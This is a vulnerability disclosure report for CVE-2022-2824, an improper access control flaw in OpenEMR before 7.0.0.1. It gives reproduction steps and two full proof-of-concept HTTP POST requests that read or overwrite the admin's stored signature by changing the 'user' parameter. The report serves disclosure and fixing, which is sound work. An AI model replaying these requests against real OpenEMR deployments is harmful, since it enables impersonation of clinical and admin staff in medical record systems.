Headline
CVE-2022-2824: User can do all actives with other's signature (view, get, create, update, delete,...) in openemr
Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.
Description
I observed that users can view any user’s signature by changing their user parameter to other’s user parameter. By the same way users can create/delete/update other’s signature in create signature function.
View/Get other’s signature:
1. Login to an account (I use account receptionist).
2. Click "Portal > Portal Audits > Home > Signature on File > Use Current " to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5)
4. Send request, you will see the signature of admin is sent in response.
Create/Update/Delete other’s signature:
1. Login to an account (I use account receptionist).
2. Click "Portal > Portal Audits > Home > Signature on File > {Sign your signature} > Sign and Save " to create your own signature. Intercept this request with Burpsuite.
3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5)
4. Send this request.
5. Login with admin account. You will see admin's signature was created.
Proof of Concept****View/Get other’s signature:
POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 61
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
Create/Update/Delete other’s signature:
POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 39622
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/json
Accept: */*
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
Impact
Attacker can get/create/update any user’s signature including admin’s signature. As a result, he/she can impersonate admin or anyone to perform actions.
Occurrences